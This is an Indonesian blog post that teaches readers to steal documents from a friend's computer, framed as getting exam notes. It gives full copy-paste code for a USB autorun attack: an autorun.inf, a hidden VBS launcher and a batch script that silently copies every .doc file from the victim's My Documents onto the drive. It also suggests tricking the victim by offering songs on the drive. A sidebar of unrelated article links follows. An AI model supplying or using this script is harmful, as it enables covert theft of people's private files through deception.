Tunggu sebentar!

Sabtu, 13 April 2013

Cara mencuri data dari komputer orang lain

Ok, bayangkan anda sedang menghadapi ujian terakhir, dan anda belum siap, tetapi teman anda punya jawaban atau catatan penting di laptop atau di komputernya tapi tidak mau berbagi dengan anda, dan teman anda ini sedikit goblok, dan anda kepengen mencuri isi dokumen yang berada dikomputernya.

Cara mencuri data di komputernya adalah dengan pergi kerumahnya dimalam hari dengan membawa flashdisk yang digantung dileher anda, dan sembunyi2 masuk ke kamarnya dan mengcopy isi dokumen di harddisknya, jadi pencuri beneran nih? hehehehe. atau alternatif lain, kita kan temanan yah ceritanya, jadi bilang ajah gini ama dia, “Teman, aku punya lagu baru ini di flashdisk gue? mau copy ngga?” nah lalu kita copykan lagu nya ke komputer dia. (sssssttt diam2 yah!)

Kayaknya cara pertama diatas dengan menjadi pencuri beneran ngga enak yah? hehehe. langsung ajah kita pake cara halus. ikuti langkah2 berikut:
Sebelumnya siapin dolo flashdisk kita (kalo bisa isinya gede)

Langkah ke-1

Buka Notepad (saya sarankan pake program Notepad++) copy dan paste kode dibawah ini.
[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat
Kemudian simpanlah di flashdisk dengan nama: autorun.inf

Langkah ke-2

Buka Notepad lagi dan copas kode berikut:
@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\My Documents\*.doc" "%drive%\all\doc"
@echo off
cls
Simpan di flashdisk anda dengan nama:file.bat

Langkah ke-3

Buka Notepad lagi dan copas kode berikut:
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Simpan di flashdisk anda dengan nama:invisible.vbs

Langkah ke-4

Buka Notepad lagi dan copas lagi kode berikut:
wscript.exe \invisible.vbs file.bat
Simpan di flashdisk anda dengan nama:launch.bat

Ok, sekarang pastikan ke-4 file tadi yang telah kita buat berada di flashdisk kita, dan buatlah folder baru dengan nama all untuk menyimpan hasil curian kita di komputer teman tadi, dimana perintah: %backupcmd% “%USERPROFILE%\My Documents\*.doc” “%drive%\all\doc”, akan menyalin semua file ber-ekstensi .doc kedalam folder “all/doc” yang berada di flashdisk kita secara otomatis waktu kita mencolokkan flashdisk kita dikomputernya, ataupun dia sendiri yang mencolokkannya dikomputernya sendiri.

Sebelum mencoba mencuri file dikomputer teman, coba dulu flashdisk kita dikomputer kita sendiri, lihat apakah bekerja dengan baik. Selamat mencoba.

A PREGNANCY (TENTANG KEHAMILAN)
1. Hati-hati, ini dia yang harus Anda waspadai selama hamil
2. Tetap segar dan cantik meskipun hamil
3. Agar tetap bugar meskipun sedang hamil
4. Prolactinoma dan kehamilan
5. Bagaimana janin berkembang
[More...]
B PARENTING (MENJADI ORANG TUA)
1. Pentingnya lemak esensial untuk tumbuh kembang anak
2. Pengaruh buruk teman
3. 9 fakta kesehatan jaman dulu dan sekarang
4. Tips: membantu anak kikuk bergaul [sosialisasi anak]
5. Manfaat mendongeng sebelum anak tidur
[More...]
C WANITA (SEPUTAR PERMASALAHANAN WANITA)
1. Pahami masa subur
2. Memanjakan diri pasca nifas via spa vagina
3. Hamil diatas usia 35 tahun, pahami resikonya
4. Adakah masalahnya kedepan jika menunda-nunda jadi ibu?
5. Teknologi untuk merancang jenis kelamin
[More...]
D TEKNOLOGI
1. Inovasi Irigasi Untuk Masa Depan Yang Berkelanjutan
2. 10 Teratas Kemajuan Israel Dibidang Medis
3. Microresonator (Mengirimkan 40 Saluran Komunikasi dengan Satu Laser)
4. Cara memurnikan air limbah hanya menggunakan tanaman
5. Aplikasi Penghitung Sisa Hari Dalam Setahun (The Rest Of The Year)
[More...]
D SOURCE CODE VISUAL BASIC 6.0
1. Visual Basic Source Code (Transfer teks dari form ke ms-word)
2. Visual Basic Source Code (sysinfo atau informasi sistem komputer)
3. Visual Basic Source Code (software pembalik kata)
4. Visual Basic Source Code (software pengeja kata)
5. Visual Basic Source Code (IP tools)
[More...]
E KULINER (RESEP MASAKAN)
1. Resep Membuat Sambal Tuktuk khas Batak Toba
2. Cara Memasak Dali Ni Horbo
3. Resep Membuat Mie Gomak Medan
4. Resep Masakan Na Tinombur
5. Resep ayam napinadar
[More...]
F DESIGN & ART DENGAN ADOBE PHOTOSHOP CS
1. Efek Teks Fantastis menggunakan Photoshop (Teks Mosaic)
2. Efek Teks Fantastis menggunakan Photoshop (Teks Bergambar)
3. Efek Teks Fantastis menggunakan Photoshop (Teks Puding)
4. Efek Teks Fantastis menggunakan Photoshop (101 Dalmatians)
5. Efek Teks Fantastis menggunakan Photoshop (Teks Cut Out)
[More...]
G BELAJAR BAHASA INGGRIS SEHARI-HARI
1. A Break (Waktu Istirahat)
2. A conversation With A Stewardess (Percakapan Dengan Pramugari)
3. A New Neighbour (Tetangga Baru)
4. A New School Building (Gedung Sekolah Baru)
5. A Talk With A Stewardess (Percakapan Dengan Pramugari#2)
[More...]
H EFEK QUERY DARI MESIN PENCARI
1. Efek Dari Kombinasi Kata Kunci Pada Mesin Pencari#1
2. Efek Dari Kombinasi Kata Kunci Pada Mesin Pencari#2
3. Efek Dari Kombinasi Kata Kunci Pada Mesin Pencari#3
4. Efek Dari Kombinasi Kata Kunci Pada Mesin Pencari#4
5. Efek Dari Kombinasi Kata Kunci Pada Mesin Pencari#5
  [More...]